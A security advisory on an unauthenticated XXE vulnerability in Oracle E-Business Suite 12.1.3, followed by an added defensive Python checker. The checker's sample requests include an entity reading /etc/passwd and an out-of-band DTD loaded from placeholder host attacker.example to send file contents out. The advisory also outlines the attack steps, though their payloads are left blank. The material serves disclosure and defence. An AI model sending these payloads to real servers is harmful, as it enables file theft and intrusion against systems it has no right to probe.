[ERPSCAN-16-007] Oracle E-Business Suite – XXE injection vulnerability

Application: Oracle E-Business Suite
Version Affected: Oracle E-Business Suite 12.1.3, probably others
Vendor: Oracle
Bugs: XXE injection
Vendor response: 24.07.2015
Date of Public Advisory: 19.01.2016
Reference: Oracle CPU Jan 2016
Author: Nikita Kelesis, Ivan Chalykin, Alexey Tyurin

Class: XML External Entity [CWE-611]
Impact: information disclosure, DoS, SSRF, NTLM relay
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2016-0457
CVSS Information
CVSS Base Score: 5 / 10

AV: Access Vector (Related exploit range) Network (N)
AC: Access Complexity (Required attack complexity) Medium (M)
Au: Authentication (Level of authentication needed to exploit) None (N)
C: Impact to Confidentiality Partial (P)
I: Impact to Integrity Partial (P)
A: Impact to Availability Partial (P)

The XML parser used by Oracle E-Business Suite 12.1.3 validates incoming XML requests against a DTD supplied by the requester, so an unauthenticated attacker controls the entity declarations the parser will process.

Vulnerable packages
Oracle E-Business Suite 12.1.3
Other versions are probably affected too, but they were not checked.

Technical description
The affected servlet can be reached remotely without authentication.
The servlet accepts XML messages and hands them to the XML parser.
The XML parser validates every incoming XML request against a DTD supplied in the request itself (user-specified DTD), and resolves the external entities that DTD declares.

An attacker sends an XML request whose DTD declares a malicious external entity and can:
1) read a file from the server's file system (subject to the permissions of the application server process)
2) perform a DoS attack (for example by referencing an endless resource such as a device file, or by entity expansion)
3) perform SSRF, using the server as a "tunnel" to local services and to the internal network
4) on Windows hosts: force the server to initiate an SMB/HTTP request to the attacker's host, capturing the NTLM challenge-response ("NTLM hash") for offline cracking, or relaying it in an SMB relay attack

Vulnerable URL:

To read a local file (universal, out-of-band way):
1) Run a web server that hosts a file (evil.xml) containing the external DTD with the exfiltration entities:

2) Open a listening port (8090, for example) and wait there for the payload sent by the victim server:

3) Send the request to the victim:

It is possible to perform the attack without an external (attacker-controlled) server, but the request then has to be customized for each of the servlet's input points.
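The following is an added example, not code from the advisory or from Oracle: a stand-alone pre-parse check, written in Python with only the standard library's expat bindings, that looks at an incoming XML request for the constructs the attack described above depends on (a DOCTYPE, an external DTD subset, parameter entities, SYSTEM/PUBLIC entity declarations and references to them) without resolving any of them, and a safe_parse() that refuses any request carrying a DOCTYPE. E-Business Suite is a Java product; Python is used here only so the check can be run as-is. The sample requests are constructed illustrations of the generic patterns; the host attacker.example, the file path, the evil.xml name and the listener port are placeholders and not the advisory's elided servlet URL or payload.

```python
"""Pre-parse inspection of XML requests for DTD/XXE constructs.

Added example (not part of the advisory). Uses only the standard library:
expat observes declarations but is configured to fetch nothing.
"""
import xml.parsers.expat as expat
import xml.etree.ElementTree as ET


class DtdRejected(ValueError):
    """Raised by safe_parse() when a request carries a DOCTYPE."""


def inspect_dtd(xml_bytes: bytes) -> dict:
    """Report DOCTYPE/entity constructs in xml_bytes without resolving them.

    Parameter-entity parsing is disabled (so an external subset or %ref; is
    never fetched) and the external-entity callback only records the URI
    the parser would have opened, so nothing is read from file:// or http://.
    """
    findings = {
        "doctype": False,
        "external_subset": None,   # SYSTEM id of an external DTD, if any
        "parameter_entities": [],  # names from <!ENTITY % name ...> declarations
        "external_entities": [],   # (name, systemId) for SYSTEM/PUBLIC entities
        "external_refs": [],       # systemIds referenced from content (&xxe;)
    }
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        findings["doctype"] = True
        if system_id or public_id:
            findings["external_subset"] = system_id

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        if is_parameter:
            findings["parameter_entities"].append(name)
        if system_id is not None or public_id is not None:
            findings["external_entities"].append((name, system_id))

    def on_external_ref(context, base, system_id, public_id):
        # Content referenced an external general entity. Record the URI and
        # tell expat the reference was handled, without opening anything.
        findings["external_refs"].append(system_id)
        return 1

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.Parse(xml_bytes, True)
    return findings


def is_xxe_candidate(findings: dict) -> bool:
    """True if the request declares or references anything outside itself."""
    return bool(findings["external_subset"] or findings["parameter_entities"]
                or findings["external_entities"] or findings["external_refs"])


def safe_parse(xml_bytes: bytes) -> ET.Element:
    """Refuse any DOCTYPE before parsing (same effect as JAXP's
    disallow-doctype-decl feature): no DTD means no entities to resolve."""
    if inspect_dtd(xml_bytes)["doctype"]:
        raise DtdRejected("DOCTYPE is not accepted on this endpoint")
    return ET.fromstring(xml_bytes)


# Constructed sample requests (placeholders, not the advisory's payload).
BENIGN = b'<?xml version="1.0"?><request><id>42</id></request>'

# Classic in-band file read: the entity body is echoed back in the response.
FILE_READ = (b'<?xml version="1.0"?>'
             b'<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
             b'<r>&xxe;</r>')

# Out-of-band pattern of the steps above: the attacker's evil.xml defines the
# entities that push the file contents to the attacker's listener.
OOB = (b'<?xml version="1.0"?>'
       b'<!DOCTYPE r [<!ENTITY % dtd SYSTEM "http://attacker.example/evil.xml"> %dtd; %send;]>'
       b'<r>oob</r>')

# External DTD subset only: fetched by a vulnerable parser before the body is read.
EXTERNAL_SUBSET = b'<!DOCTYPE r SYSTEM "http://attacker.example/evil.dtd"><r/>'


if __name__ == "__main__":
    for label, sample in [("benign", BENIGN), ("file_read", FILE_READ),
                          ("oob", OOB), ("external_subset", EXTERNAL_SUBSET)]:
        f = inspect_dtd(sample)
        print(f"{label:16} xxe_candidate={is_xxe_candidate(f)} {f}")
```

For Java code that handles XML itself, the equivalent hardening is `factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)` on the DocumentBuilderFactory (or SAXParserFactory) before parsing; for the Oracle-shipped servlet, the fix is the vendor patch referenced below.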

Solution
Install Oracle CPU Jan 2016